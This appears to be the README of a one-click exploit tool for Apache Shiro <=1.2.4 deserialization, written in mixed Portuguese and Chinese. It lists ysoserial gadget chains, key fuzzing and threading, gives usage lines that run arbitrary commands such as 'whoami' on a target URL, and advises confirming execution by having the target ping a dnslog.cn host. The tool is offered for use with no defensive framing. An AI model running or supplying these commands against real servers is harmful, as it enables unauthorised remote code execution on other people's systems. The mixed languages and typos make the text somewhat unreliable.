
shiro 1.2.47 反序列化
Ferramenta de detecção em um clique para desserialização Shiro<=1.2.4
Alterações: 1. Adicionados 4 módulos de gadget chain (CommonsCollections7-10); a taxa de sucesso deve aumentar 30%. Já empacotados no novo jar do ysoserial; não substitua
Alterações: 2. Adicionado suporte a multithreading; embora os módulos tenham aumentado, a velocidade aumentou 300%
集成21个key进行fuzz
Se foi útil, dê um star, por favor. Post correspondente no blog: http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
Uso:python3 shiro.py url command
Uso:python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ Para verificação, recomendo usar esta plataforma dnslog; é muito mais rápida que ceye.io
Lembre-se de usar aspas "" em comandos com espaços
uso:python3 shiro.py http://url.com "ping dnslog.cn"
Execute todos os 11 módulos e depois verifique na plataforma dnslog se a requisição foi recebida; se não aparecer, é GG — também pode ser que a codificação ainda não seja suficiente
Colete as codificações por conta própria; basta adicionar métodos no código-fonte em moule
Para simplificar a execução do script, o número de threads não é controlado por parâmetros do usuário; o padrão é 20 threads. Se precisar alterar, vá até a linha 20 do código em /moule/main.py e modifique o parâmetro que controla as threads